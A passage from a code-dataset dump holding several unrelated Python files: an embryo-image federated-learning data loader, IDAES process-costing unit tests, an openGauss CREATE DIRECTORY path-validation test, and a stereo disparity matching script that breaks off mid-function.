pprint(data)\n#\ndb.connect('../db.sqlite')\n#\nsite_anime_db.save_production(data)\n#\ndb.disconnect()\n","repo_name":"LeandroDeJesus-S/animanage","sub_path":"scrapings/onimesonline_online_scrap.py","file_name":"onimesonline_online_scrap.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"43372749842","text":"import enum as enum\nfrom plato.datasources import base\nimport os\nimport pandas as pd\nfrom PIL import Image as Image\nfrom typing import Callable, Tuple, Any, Optional\nfrom torchvision.datasets import VisionDataset\nimport numpy as np\nimport torch\nimport numpy\nfrom torchvision import datasets, transforms\nfrom sklearn.model_selection import train_test_split\nfrom plato.config import Config\nimport logging\n\nclass EmbryosDataset(VisionDataset):\n\n def __init__(\n self, data, targets, clinic_ids, root = \"\", transform: Optional[Callable] = transforms.ToTensor(), target_transform: Optional[Callable] = None) \\\n -> None:\n super().__init__(root=root, transform=transform, target_transform=target_transform)\n self.data = data\n self.transform = transform\n self.target_transform = target_transform\n self.targets = targets\n self.clinic_ids = clinic_ids\n self._root = root\n self.classes = [0, 1]\n\n def __len__(self):\n return len(self.targets)\n\n def __getitem__(self, index: int) -> Tuple[Any, Any]:\n \"\"\"\n Args:\n index (int): Index\n\n Returns:\n tuple: (image, target) where target is index of the target class.\n \"\"\"\n # doing this so that it is consistent with all other datasets\n # to return a PIL Image\n sampleId = self.data.iloc[[index]]['SampleID'].values[0]\n file_path = os.path.join(self._root, \"{:05d}.npz\".format(sampleId))\n img, target = self._load_image(file_path), int(self.targets[index])\n\n if self.transform is not None:\n img = self.transform(img)\n\n if self.target_transform is not None:\n target = self.target_transform(target)\n\n return img, target\n \n \n def _load_image(self, path):\n file_data = np.load(path)\n images = file_data['images']\n\n focal = 1\n frame = 0\n img_raw = images[frame, :, :, focal]\n img = Image.fromarray(img_raw)\n newsize = (250, 250)\n img = img.resize(newsize)\n img_raw = np.asarray(img)\n img_raw = img_raw.astype('float32') / 255\n return img_raw\n\nclass DataSource(base.DataSource):\n def __init__(self, client_id=0):\n super().__init__()\n self._oversampling = False\n self.trainset = None\n self.testset = None\n self.validationset = None\n self._root = \"/mnt/data/mlr_ahj_datasets/vitrolife/dataset/\"\n\n #Loading in the meta data file\n metadata_file_path = os.path.join(self._root, \"metadata.csv\")\n self._meta_data = pd.read_csv(metadata_file_path)\n \n # If indicated in the config file - The clients will be using the labIds in the order from most data to least, meaning that when using a lower amount of clients than labIds the labs with the lowest amount of training data are not used\n sortedIds = self._size_sort_client_ids() if (hasattr(Config().data, \"size_sorted\") and Config().data.size_sorted) else range(23)\n if client_id != 0: logging.info(\"client-id #%d will be designated labId #%d\", client_id, sortedIds[client_id-1])\n \n # Splitting train, test and validation data\n meta_data_train_validation = self._meta_data.loc[self._meta_data['Testset'] == 0]\n meta_data_test = self._meta_data.loc[self._meta_data['Testset'] == 1]\n \n if client_id != 0:\n client_train_validation_data = meta_data_train_validation.loc[meta_data_train_validation['LabID'] == sortedIds[client_id-1]]\n client_train_data, client_validation_data = train_test_split(client_train_validation_data, test_size=0.172, random_state=42)\n client_test_data = meta_data_test.loc[meta_data_test['LabID'] == sortedIds[client_id-1]]\n else:\n client_train_data, client_validation_data = train_test_split(meta_data_train_validation, 
test_size=0.172, random_state=42)\n client_test_data = meta_data_test\n\n #Loading in data\n train_data, train_targets, train_clinic_ids = self._load_data_type(client_train_data)\n validation_data, validation_targets, validation_clinic_ids = self._load_data_type(client_validation_data)\n test_data, test_targets, test_clinic_ids = self._load_data_type(client_test_data)\n\n self.trainset = EmbryosDataset(data=train_data, targets=train_targets, clinic_ids=train_clinic_ids, root=self._root)\n self.validationset = EmbryosDataset(data=validation_data, targets=validation_targets, clinic_ids=validation_clinic_ids, root=self._root)\n self.testset = EmbryosDataset(data=test_data, targets=test_targets, clinic_ids=test_clinic_ids, root=self._root)\n\n def _size_sort_client_ids(self):\n logging.info(\"Sorting Embryo dataset based on lab size\")\n ids = range(23)\n sizes = []\n train_val_data = self._meta_data.loc[self._meta_data['Testset'] == 0]\n for id in ids:\n sizes.append(len(train_val_data.loc[train_val_data['LabID'] == id]))\n assert(len(sizes) == 23)\n sortedIds = [x for _,x in sorted(zip(sizes,ids), reverse=True)]\n self.sortedIds = sortedIds\n return sortedIds\n\n\n\n def _load_data_type(self, metadata):\n data = metadata\n labels = data[\"Label\"].tolist()\n labels = torch.LongTensor(labels)\n clinic_ids = data[\"LabID\"].tolist()\n clinic_ids = torch.LongTensor(clinic_ids)\n \n return data, labels, clinic_ids","repo_name":"thecml/fedasync-with-fairness","sub_path":"src/plato/datasources/embryos.py","file_name":"embryos.py","file_ext":"py","file_size_in_byte":5478,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"}
+{"seq_id":"22487178275","text":"import pytest\n\nfrom pyomo.environ import ConcreteModel, Constraint, Set, units as pyunits, Var, Param\nfrom pyomo.util.check_units import assert_units_consistent, assert_units_equivalent\n\nfrom idaes.core import declare_process_block_class, UnitModelBlockData\nfrom idaes.core.util.model_statistics import degrees_of_freedom\n\nfrom idaes.core import (\n FlowsheetCostingBlock,\n FlowsheetCostingBlockData,\n UnitModelCostingBlock,\n register_idaes_currency_units,\n)\n\n# TODO : Tests for cases with multiple costing packages\npyunits.load_definitions_from_strings([\"USD_test = [test_currency]\"])\n\n\n@pytest.mark.unit\ndef test_register_idaes_currency_units():\n # Register standard currency units\n register_idaes_currency_units()\n\n assert \"USD_CE500\" in pyunits.pint_registry\n\n CEI = {\n \"USD_1990\": 357.6,\n \"USD_1991\": 361.3,\n \"USD_1992\": 358.2,\n \"USD_1993\": 359.2,\n \"USD_1994\": 368.1,\n \"USD_1995\": 381.1,\n \"USD_1996\": 381.7,\n \"USD_1997\": 386.5,\n \"USD_1998\": 389.5,\n \"USD_1999\": 390.6,\n \"USD_2000\": 394.1,\n \"USD_2001\": 394.3,\n \"USD_2002\": 395.6,\n \"USD_2003\": 402.0,\n \"USD_2004\": 444.2,\n \"USD_2005\": 468.2,\n \"USD_2006\": 499.6,\n \"USD_2007\": 525.4,\n \"USD_2008\": 575.4,\n \"USD_2009\": 521.9,\n \"USD_2010\": 550.8,\n \"USD_2011\": 585.7,\n \"USD_2012\": 584.6,\n \"USD_2013\": 567.3,\n \"USD_2014\": 576.1,\n \"USD_2015\": 556.8,\n \"USD_2016\": 541.7,\n \"USD_2017\": 567.5,\n \"USD_2018\": 603.1,\n \"USD_2019\": 607.5,\n \"USD_2020\": 596.2,\n \"USD_2021\": 708.0,\n }\n\n for c, conv in CEI.items():\n assert c in pyunits.pint_registry\n\n assert pytest.approx(conv / 500, rel=1e-10) == pyunits.convert_value(\n 1, pyunits.USD_CE500, getattr(pyunits, c)\n )\n\n\nclass TestFlowsheetCostingBlock:\n @pytest.mark.unit\n def test_basic_attributes(self):\n m = ConcreteModel()\n\n with pytest.raises(\n ValueError,\n match=\"costing - costing package has not specified the base \"\n \"currency units to use for costing.\",\n ):\n m.costing = FlowsheetCostingBlock()\n\n assert m.costing.base_currency is None\n assert m.costing.base_period is pyunits.year\n assert m.costing.defined_flows == {}\n assert FlowsheetCostingBlockData.unit_mapping == {}\n\n @pytest.mark.unit\n def test_build_global_params(self):\n with pytest.raises(\n NotImplementedError,\n match=\"Derived class has not defined a \" \"build_global_params method.\",\n ):\n FlowsheetCostingBlockData.build_global_params(self)\n\n @pytest.mark.unit\n def test_build_process_costs(self):\n with pytest.raises(\n NotImplementedError,\n match=\"Derived class has not defined a \" \"build_process_costs method.\",\n ):\n FlowsheetCostingBlockData.build_process_costs(self)\n\n @pytest.mark.unit\n def test_initialize_build(self):\n with pytest.raises(\n NotImplementedError,\n match=\"Derived class has not defined an \" \"initialize_build method.\",\n ):\n FlowsheetCostingBlockData.initialize(self)\n\n\n# Create some dummy classes to represent inherited unit models\n@declare_process_block_class(\"TypeA\")\nclass TypeAData(UnitModelBlockData):\n def build(self):\n super().build()\n self.class_type = \"A\"\n\n\n@declare_process_block_class(\"TypeB\")\nclass TypeBData(TypeAData):\n def build(self):\n super().build()\n self.class_type = \"B\"\n\n\n@declare_process_block_class(\"TypeC\")\nclass TypeCData(TypeBData):\n def build(self):\n super().build()\n self.class_type = \"C\"\n\n\n@declare_process_block_class(\"TypeD\")\nclass TypeDData(TypeAData):\n def build(self):\n 
super().build()\n self.class_type = \"D\"\n\n\n@declare_process_block_class(\"TypeE\")\nclass TypeEData(UnitModelBlockData):\n def build(self):\n super().build()\n self.class_type = \"E\"\n\n\n@declare_process_block_class(\"DummyCostingPackage\")\nclass DummyCostingPackageData(FlowsheetCostingBlockData):\n def build_global_params(self):\n self.base_currency = pyunits.USD_test\n self.base_period = pyunits.year\n\n self.test_flow_2_cost = Param(initialize=0.07, units=pyunits.kW)\n\n self.defined_flows = {\n \"test_flow_1\": 0.2 * pyunits.J,\n \"test_flow_2\": self.test_flow_2_cost,\n }\n\n self._bgp = True\n\n def build_process_costs(self):\n self._bpc = True\n\n def initialize_build(self):\n self._init = True\n\n def method_1(blk):\n blk.cost_method = 1\n\n def method_2(blk):\n blk.cost_method = 2\n\n def method_3(blk):\n blk.cost_method = 3\n\n def method_4(blk):\n blk.cost_method = 4\n\n unit_mapping = {TypeA: method_1, TypeB: method_2, TypeC: method_3}\n\n\nclass TestFlowsheetCostingBlock:\n @pytest.mark.unit\n def test_costing_package_no_base_currency(self):\n @declare_process_block_class(\"TestCostingPackage2\")\n class TestCostingPackage2Data(DummyCostingPackageData):\n def build_global_params(self):\n super().build_global_params()\n self.base_currency = None\n\n m = ConcreteModel()\n\n with pytest.raises(\n ValueError,\n match=\"costing - costing package has not specified the base \"\n \"currency units to use for costing.\",\n ):\n m.costing = TestCostingPackage2()\n\n @pytest.fixture(scope=\"class\")\n def costing(self):\n m = ConcreteModel()\n m.costing = DummyCostingPackage()\n\n return m\n\n @pytest.mark.unit\n def test_basic_attributes(self, costing):\n assert costing.costing._registered_unit_costing == []\n assert isinstance(costing.costing.flow_types, Set)\n assert len(costing.costing.flow_types) == 2\n assert \"test_flow_1\" in costing.costing.flow_types\n assert costing.costing._registered_flows == {\n \"test_flow_1\": [],\n \"test_flow_2\": [],\n }\n\n assert costing.costing._costing_methods_map == {\n TypeAData: DummyCostingPackageData.method_1,\n TypeBData: DummyCostingPackageData.method_2,\n TypeCData: DummyCostingPackageData.method_3,\n }\n\n # Check that test_flow_1 was properly defined\n assert isinstance(costing.costing.test_flow_1_cost, Var)\n assert costing.costing.test_flow_1_cost.value == 0.2\n assert_units_equivalent(costing.costing.test_flow_1_cost.get_units(), pyunits.J)\n\n assert isinstance(costing.costing.test_flow_2_cost, Param)\n\n # Test that build_global_parameters was called successfully\n assert costing.costing._bgp\n\n @pytest.mark.unit\n def test_register_flow_type(self, costing):\n costing.costing.register_flow_type(\n \"test_flow\", 42 * pyunits.USD_test / pyunits.mol\n )\n\n assert isinstance(costing.costing.test_flow_cost, Var)\n assert costing.costing.test_flow_cost.value == 42\n assert_units_equivalent(\n costing.costing.test_flow_cost.get_units(), pyunits.USD_test / pyunits.mol\n )\n assert \"test_flow\" in costing.costing.flow_types\n\n assert costing.costing._registered_flows == {\n \"test_flow_1\": [],\n \"test_flow_2\": [],\n \"test_flow\": [],\n }\n\n @pytest.mark.unit\n def test_register_flow_component_exists(self, costing):\n costing.costing.test_flow_3_cost = Var()\n with pytest.raises(\n RuntimeError,\n match=\"Component test_flow_3_cost already exists on costing but is not 42.\",\n ):\n costing.costing.register_flow_type(\"test_flow_3\", 42)\n # cleanup for next test\n costing.costing.flow_types.remove(\"test_flow_3\")\n 
costing.costing.del_component(costing.costing.test_flow_3_cost)\n\n @pytest.mark.unit\n def test_cost_flow_invalid_type(self, costing):\n with pytest.raises(\n ValueError,\n match=\"foo is not a recognized flow type. Please \"\n \"check your spelling and that the flow type has \"\n \"been registered with the FlowsheetCostingBlock.\",\n ):\n costing.costing.cost_flow(42, \"foo\")\n\n @pytest.mark.unit\n def test_cost_flow_indexed_var(self, costing):\n costing.indexed_var = Var(\n [1, 2, 3], initialize=1, units=pyunits.mol / pyunits.s\n )\n with pytest.raises(\n TypeError,\n match=\"indexed_var is an indexed component. Flow \"\n \"costing only supports unindexed components.\",\n ):\n costing.costing.cost_flow(costing.indexed_var, \"test_flow\")\n\n @pytest.mark.unit\n def test_cost_flow_unbounded_var(self, costing, caplog):\n costing.costing.cost_flow(costing.indexed_var[1], \"test_flow\")\n\n warn_str = (\n \"indexed_var[1] has a lower bound of less \"\n \"than zero. Costing requires that all flows have a \"\n \"lower bound equal to or greater than zero to \"\n \"avoid negative costs.\"\n )\n\n assert warn_str in caplog.text\n\n @pytest.mark.unit\n def test_cost_flow_var(self, costing):\n costing.indexed_var[1].setlb(0)\n\n costing.costing.cost_flow(costing.indexed_var[1], \"test_flow\")\n\n assert costing.indexed_var[1] in costing.costing._registered_flows[\"test_flow\"]\n\n @pytest.mark.unit\n def test_cost_flow_unbounded_expr(self, costing, caplog):\n costing.costing.cost_flow(-costing.indexed_var[2], \"test_flow\")\n\n warn_str = (\n \"flow_expr is an expression with a lower \"\n \"bound of less than zero. Costing requires that \"\n \"all flows have a lower bound equal to or greater \"\n \"than zero to avoid negative costs.\"\n )\n\n assert warn_str in caplog.text\n\n @pytest.mark.unit\n def test_cost_flow_expr(self, costing):\n costing.indexed_var[2].setub(0)\n\n costing.costing.cost_flow(-costing.indexed_var[2], \"test_flow\")\n\n assert str(-costing.indexed_var[2]) == str(\n costing.costing._registered_flows[\"test_flow\"][-1]\n )\n\n @pytest.mark.unit\n def test_get_costing_method_for(self, costing):\n costing.unit_a = TypeA()\n costing.unit_b = TypeB()\n costing.unit_c = TypeC()\n costing.unit_d = TypeD()\n costing.unit_e = TypeE()\n\n assert isinstance(costing.unit_a, TypeAData)\n\n assert (\n costing.costing._get_costing_method_for(costing.unit_a)\n is DummyCostingPackageData.method_1\n )\n\n assert (\n costing.costing._get_costing_method_for(costing.unit_b)\n is DummyCostingPackageData.method_2\n )\n\n assert (\n costing.costing._get_costing_method_for(costing.unit_c)\n is DummyCostingPackageData.method_3\n )\n\n # TypeD not registered with property package, but inherits from TypeA\n # Should get method_1\n assert (\n costing.costing._get_costing_method_for(costing.unit_d)\n is DummyCostingPackageData.method_1\n )\n\n # TypeE not registered with property package and no inheritance\n # Should return RuntimeError\n with pytest.raises(\n RuntimeError,\n match=\"Could not identify default costing method \"\n \"for unit_e. This implies the unit model's class \"\n \"and parent classes do not exist in the default \"\n \"mapping provided by the costing package. 
Please \"\n \"provide a specific costing method for this unit.\",\n ):\n costing.costing._get_costing_method_for(costing.unit_e)\n\n @pytest.mark.unit\n def test_cost_unit_first(self, costing):\n costing.unit_a.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing\n )\n\n assert costing.unit_a.costing.cost_method == 1\n\n assert costing.unit_a.costing in costing.unit_a._initialization_order\n assert costing.unit_a.costing in costing.costing._registered_unit_costing\n\n @pytest.mark.unit\n def test_del_unit_costing(self, costing):\n costing.unit_a.del_component(costing.unit_a.costing)\n\n assert not hasattr(costing.unit_a, \"costing\")\n assert costing.unit_a._initialization_order == []\n assert costing.costing._registered_unit_costing == []\n\n @pytest.mark.unit\n def test_cost_unit_duplicate(self, costing):\n costing.unit_a.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing\n )\n\n # First, check implicit replacement\n # This should work\n costing.unit_a.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing,\n costing_method=DummyCostingPackageData.method_2,\n )\n\n assert costing.unit_a.costing.cost_method == 2\n\n assert costing.unit_a.costing in costing.unit_a._initialization_order\n assert costing.unit_a.costing in costing.costing._registered_unit_costing\n\n # Then check double costing\n with pytest.raises(\n RuntimeError,\n match=\"Unit model unit_a already has a costing block \"\n \"registered: unit_a.costing. Each unit may only have a single \"\n \"UnitModelCostingBlock associated with it.\",\n ):\n costing.unit_a.costing2 = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing\n )\n\n # Clean everything up at the end\n costing.unit_a.del_component(costing.unit_a.costing)\n costing.unit_a.del_component(costing.unit_a.costing2)\n\n # Make sure we cleaned up\n assert not hasattr(costing.unit_a, \"costing\")\n assert not hasattr(costing.unit_a, \"costing2\")\n\n @pytest.mark.unit\n def test_cost_unit_custom_method(self, costing):\n def custom_method(blk):\n blk.capital_cost = Var(\n initialize=1, bounds=(0, 1e10), units=pyunits.USD_test\n )\n blk.fixed_operating_cost = Var(\n initialize=1, bounds=(0, 1e10), units=pyunits.USD_test / pyunits.year\n )\n blk.variable_operating_cost = Var(\n initialize=1, bounds=(0, 1e10), units=pyunits.USD_test / pyunits.year\n )\n\n blk.capital_cost_constraint = Constraint(\n expr=blk.capital_cost == 4.2e6 * pyunits.USD_test\n )\n blk.fixed_operating_cost_constraint = Constraint(\n expr=blk.fixed_operating_cost == 1e2 * pyunits.USD_test / pyunits.year\n )\n blk.variable_operating_cost_constraint = Constraint(\n expr=blk.variable_operating_cost\n == 7e4 * pyunits.USD_test / pyunits.year\n )\n\n blk._checkvar = True\n\n costing.unit_a.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=custom_method\n )\n\n assert isinstance(costing.unit_a.costing, UnitModelCostingBlock)\n assert costing.unit_a.costing in costing.unit_a._initialization_order\n assert costing.unit_a.costing in costing.costing._registered_unit_costing\n\n assert isinstance(costing.unit_a.costing.capital_cost, Var)\n assert isinstance(costing.unit_a.costing.variable_operating_cost, Var)\n assert isinstance(costing.unit_a.costing.fixed_operating_cost, Var)\n assert costing.unit_a.costing._checkvar\n\n @pytest.mark.unit\n def test_cost_unit_capital_cost_not_var(self, costing):\n def dummy_method(blk):\n blk.capital_cost = \"foo\"\n\n with pytest.raises(\n TypeError,\n 
match=\"unit_b capital_cost component must be a \"\n \"Var. Please check the costing package you are \"\n \"using to ensure that all costing components are \"\n \"declared as variables.\",\n ):\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_unit_capital_cost_lb(self, costing, caplog):\n def dummy_method(blk):\n blk.capital_cost = Var()\n\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n assert (\n \"unit_b capital_cost component has a lower bound less than \"\n \"zero. Be aware that this may result in negative costs during \"\n \"optimization.\" in caplog.text\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_unit_fixed_operating_cost_not_var(self, costing):\n def dummy_method(blk):\n blk.fixed_operating_cost = \"foo\"\n\n with pytest.raises(\n TypeError,\n match=\"unit_b fixed_operating_cost component must \"\n \"be a Var. Please check the costing package you \"\n \"are using to ensure that all costing components \"\n \"are declared as variables.\",\n ):\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_unit_fixed_operating_cost_lb(self, costing, caplog):\n def dummy_method(blk):\n blk.fixed_operating_cost = Var()\n\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n assert (\n \"unit_b fixed_operating_cost component has a lower bound less \"\n \"than zero. Be aware that this may result in negative costs \"\n \"during optimization.\" in caplog.text\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_unit_variable_operating_cost_not_var(self, costing):\n def dummy_method(blk):\n blk.variable_operating_cost = \"foo\"\n\n with pytest.raises(\n TypeError,\n match=\"unit_b variable_operating_cost component \"\n \"must be a Var. Please check the costing package \"\n \"you are using to ensure that all costing \"\n \"components are declared as variables.\",\n ):\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_unit_variable_operating_cost_lb(self, costing, caplog):\n def dummy_method(blk):\n blk.variable_operating_cost = Var()\n\n costing.unit_b.costing = UnitModelCostingBlock(\n flowsheet_costing_block=costing.costing, costing_method=dummy_method\n )\n\n assert (\n \"unit_b variable_operating_cost component has a lower bound \"\n \"less than zero. 
Be aware that this may result in negative \"\n \"costs during optimization.\" in caplog.text\n )\n\n # Clean up for next test\n costing.unit_b.del_component(costing.unit_b.costing)\n\n @pytest.mark.unit\n def test_cost_process(self, costing):\n costing.costing.cost_process()\n\n # Check that build_process_costs was called from costing package\n assert costing.costing._bpc\n\n # Then check aggregation\n assert isinstance(costing.costing.aggregate_capital_cost, Var)\n assert str(costing.costing.aggregate_capital_cost.get_units()) == str(\n pyunits.USD_test\n )\n assert isinstance(costing.costing.aggregate_capital_cost_constraint, Constraint)\n\n assert isinstance(costing.costing.aggregate_fixed_operating_cost, Var)\n assert str(pyunits.USD_test / pyunits.year) == str(\n costing.costing.aggregate_fixed_operating_cost.get_units()\n )\n assert isinstance(\n costing.costing.aggregate_fixed_operating_cost_constraint, Constraint\n )\n\n assert isinstance(costing.costing.aggregate_variable_operating_cost, Var)\n assert str(pyunits.USD_test / pyunits.year) == str(\n costing.costing.aggregate_variable_operating_cost.get_units()\n )\n assert isinstance(\n costing.costing.aggregate_variable_operating_cost_constraint, Constraint\n )\n\n assert isinstance(costing.costing.aggregate_flow_test_flow, Var)\n assert str(pyunits.mol / pyunits.s) == str(\n costing.costing.aggregate_flow_test_flow.get_units()\n )\n assert isinstance(\n costing.costing.aggregate_flow_test_flow_constraint, Constraint\n )\n\n # We also have a test_flow_1 type registered, but no flows costed\n # This should have been skipped\n assert not hasattr(costing.costing, \"aggregate_flow_test_flow_1\")\n assert not hasattr(costing.costing, \"aggregate_flow_test_flow_1_constraint\")\n # unused flows do not get added to aggregate_flow_costs\n assert \"test_flow_1\" not in costing.costing.aggregate_flow_costs\n\n assert isinstance(costing.costing.aggregate_flow_costs, Var)\n assert str(pyunits.USD_test / pyunits.year) == str(\n costing.costing.aggregate_flow_costs.get_units()\n )\n assert len(costing.costing.aggregate_flow_costs) == 1\n assert isinstance(costing.costing.aggregate_flow_costs_constraint, Constraint)\n assert len(costing.costing.aggregate_flow_costs_constraint) == 1\n\n @pytest.mark.unit\n def test_unit_consistency(self, costing):\n assert_units_consistent(costing)\n\n @pytest.mark.unit\n def test_degrees_of_freedom(self, costing):\n costing.indexed_var[1].fix(2)\n costing.indexed_var[2].fix(-3)\n costing.indexed_var[3].fix(0)\n\n assert degrees_of_freedom(costing) == 0\n\n @pytest.mark.unit\n def test_initialize(self, costing):\n costing.costing.initialize()\n\n # Check that initialize was called from costing package\n assert costing.costing._init\n\n # Check that unit-level vars were initialized\n assert costing.unit_a.costing.capital_cost.value == 4.2e6\n assert costing.unit_a.costing.fixed_operating_cost.value == 100\n assert costing.unit_a.costing.variable_operating_cost.value == 7e4\n\n # Check that aggregate vars were initialized\n # Capital and operating costs should equal the unit level ones\n assert costing.costing.aggregate_capital_cost.value == 4.2e6\n assert costing.costing.aggregate_fixed_operating_cost.value == 100\n assert costing.costing.aggregate_variable_operating_cost.value == 7e4\n\n assert costing.costing.aggregate_flow_test_flow.value == 10\n\n assert pytest.approx(\n costing.costing.aggregate_flow_costs[\"test_flow\"].value, rel=1e-12\n ) == (\n pyunits.convert_value(\n 10 * 42, from_units=1 / pyunits.s, 
to_units=1 / pyunits.year\n )\n )\n","repo_name":"IDAES/idaes-pse","sub_path":"idaes/core/base/tests/test_costing_base.py","file_name":"test_costing_base.py","file_ext":"py","file_size_in_byte":23519,"program_lang":"python","lang":"en","doc_type":"code","stars":171,"dataset":"github-code","pt":"8"}
+{"seq_id":"71074254982","text":"import os\nimport unittest\n\nfrom testcase.utils.CommonSH import CommonSH\nfrom testcase.utils.Logger import Logger\nfrom yat.test import Node\nfrom yat.test import macro\n\nlogger = Logger()\n\n\nclass Function(unittest.TestCase):\n\n def setUp(self):\n logger.info(f\"-----{os.path.basename(__file__)}开始执行-----\")\n self.commonsh = CommonSH(\"dbuser\")\n self.userNode = Node(\"dbuser\")\n self.link_path = os.path.join(\"/home\", f\"{self.userNode.ssh_user}\",\n \"my_link0005\")\n\n def test_directory(self):\n text = \"-----前置准备 创建符号链接-----\"\n logger.info(text)\n self.soft_link = [f\"rm -rf {self.link_path}\",\n f\"ln -s /tmp {self.link_path}\"]\n for i in range(2):\n msg = self.userNode.sh(self.soft_link[i]).result()\n logger.info(msg)\n self.assertTrue(len(msg.strip()) == 0, \"执行失败\" + text)\n\n text = \"-----step1+2+3:路径含特殊字符/路径是相对路径/路径是符号连接;expect:-----\"\n logger.info(text)\n error_path = [\"/&~?!tmp/\", \"../tmp/\", f\"{self.link_path}\"]\n error_msg = ['illegal string: \"&\"',\n \"ERROR: directory path cannot be relative\",\n \"is not a directory, please check\"]\n for j in range(3):\n sql_cmd = f\"create or replace directory dir as '{error_path[j]}';\"\n msg1 = self.commonsh.execut_db_sql(sql_cmd)\n logger.info(msg1)\n self.assertTrue(error_msg[j] in msg1, \"执行失败\" + text)\n\n def tearDown(self):\n text = \"清理环境\"\n logger.info(text)\n result = self.userNode.sh(self.soft_link[0]).result()\n logger.info(result)\n self.assertTrue(len(result.strip()) == 0, \"执行失败\" + text)\n logger.info(f\"-----{os.path.basename(__file__)}执行结束-----\")","repo_name":"tttomorrow/1","sub_path":"openGaussBase/testcase/SQL/DDL/directory/Opengauss_Function_DDL_Create_Directory_Case0005.py","file_name":"Opengauss_Function_DDL_Create_Directory_Case0005.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"71358339462","text":"import numpy as np\n# from src.io.psee_loader import PSEELoader\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\n\n'''\nev - left frame - right\n\n\n'''\n\ndef img_normalization(img,percentile_low = 0.05,percentile_high = 99.95):\n norm_img = img.copy()\n rmin,rmax = np.percentile(norm_img,(percentile_low,percentile_high))\n # print('rmin,rmax',rmin,rmax)\n scale = 255/(rmax - rmin)\n print('min' ,rmin,'max',rmax,'scale',scale)\n norm_img = (norm_img - rmin) * scale\n norm_img = np.uint8(norm_img)\n return norm_img \n\ndef load_data(show_FLAG = False):\n # load event preprocessed img\n\n # ev_img_path ='/Users/cainan/Desktop/Project/data/tsukuba'\n ev_file = '/Users/cainan/Desktop/Project/data/tsukuba/scene1.row3.col5.ppm'\n\n # ev_file = '/Users/cainan/Desktop/Project/data/processed/origin_rectify/origin105ev_rectified_10.png'\n ev_img = cv2.imread(ev_file, 0) # shape (480,640\n\n # load frame preprocessed img\n # prepro_frame_img_path = ev_img_path\n # prepro_frame_img_filename = 'cam1-0noline105fr_canny_rectified1.png'\n # pre_f_file = prepro_frame_img_path + '/' + prepro_frame_img_filename\n # pre_f_file = '/Users/cainan/Desktop/Project/data/processed/origin_rectify/origin105fr_rectified.png'\n pre_f_file = '/Users/cainan/Desktop/Project/data/tsukuba/scene1.row3.col3.ppm'\n pre_frame_img = cv2.imread(pre_f_file, 0) # shape (1536,2048) 3.2times of 480\n\n if ev_img is None or pre_frame_img is None:\n print('Error: Could not load image')\n quit()\n \n if show_FLAG == True:\n cv2.imshow('pre_frame_img',pre_frame_img)\n cv2.imshow('ev_img',ev_img)\n k = cv2.waitKey(0)\n if k == 27: # ESC\n cv2.destroyAllWindows() \n return pre_frame_img, ev_img\n\ndef compute_pyramid_NCC(pre_frame_img,ev_img, template_size = (30,30)): # 60 & 40\n img_height,img_width = pre_frame_img.shape\n stepsize = 1\n step_num = 0\n wrong_num = 0\n test_wr_num =0\n disparity_map = np.zeros((img_height,img_width), np.float16) # change from flaot64 to float16\n template_width, template_height = template_size \n mis_th = int(img_width/7)\n for x in range(int(template_width * 0.5),int(img_width - template_width * 0.5),stepsize):\n for y in range(int(template_height * 0.5),int(img_height - template_height * 0.5),stepsize):\n # for x in range(175,int(img_width - template_width * 0.5),stepsize):\n # for y in range(159,int(img_height - template_height * 0.5),stepsize):\n step_num = step_num + 1\n template_c = (x,y)\n # print(template_c)\n top = template_c[1] -int(template_height * 0.5)\n left = template_c[0] - int(template_width * 0.5)\n template = pre_frame_img[top:top + template_height, left:left + template_width] # TODO top down left right \n\n # NCC_cross correlation only on the epipolar line \n ev_epi_img = ev_img[top:top + template_height,:] # top down left right; shape (20,640)\n epi_result = cv2.matchTemplate(ev_epi_img, template, cv2.TM_CCOEFF_NORMED) # shape (1,621)\n _, max_val, _, max_loc = cv2.minMaxLoc(epi_result)\n e_max_x = max_loc[0] + int(template_width * 0.5) \n disp = template_c[0] - e_max_x\n if disp < 0 or disp > mis_th :\n disparity_map[y,x] = 0\n # print(\"disp\",disp,'================')\n continue \n\n # #debug\n # ev_img_color = cv2.cvtColor(ev_img, cv2.COLOR_GRAY2BGR)\n # cv2.rectangle(ev_img_color, (max_loc[0],top), (max_loc[0] + template_width,top + template_height), (0,255,255), 1) # yellow\n # # cv2.imshow('ev_img_find',ev_img_color)\n\n # color_frame_patch = cv2.cvtColor(pre_frame_img, cv2.COLOR_GRAY2BGR)\n # 
